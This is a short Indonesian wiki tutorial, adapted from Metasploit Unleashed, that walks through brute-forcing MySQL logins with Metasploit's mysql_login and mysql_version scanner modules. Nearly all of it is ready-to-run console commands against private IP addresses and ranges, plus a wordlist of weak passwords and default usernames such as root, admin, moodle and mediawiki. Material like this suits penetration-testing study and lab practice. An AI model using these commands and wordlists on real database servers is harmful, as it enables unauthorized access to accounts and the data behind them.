Kali Linux: MySQL Login

From OnnoWiki
Revision as of 08:38, 15 February 2016 by Onnowpurbo (talk | contribs)
Jump to navigation Jump to search

Sumber: https://www.offensive-security.com/metasploit-unleashed/scanner-mysql-auxiliary-modules/


Masuk ke msfconsole

msfconsole thankyou

Hack Login

use auxiliary/scanner/mysql/mysql_login
show options
set PASS_FILE /tmp/passes.txt
set RHOSTS 192.168.0.80
set USER_FILE /tmp/users.txt
run


Cek Versi

use auxiliary/scanner/mysql/mysql_version 
show options
set RHOSTS 192.168.1.200-254
set THREADS 20
run


Siapkan passes.txt dan users.txt

Isi /tmp/passes.txt

12345
123456
1234567
12345678
123456789
secret
password
p@ssword
moodle
mediawiki
toor
s3cr3t

Isi /tmp/users.txt

moodle
mediawiki
admin
root


Referensi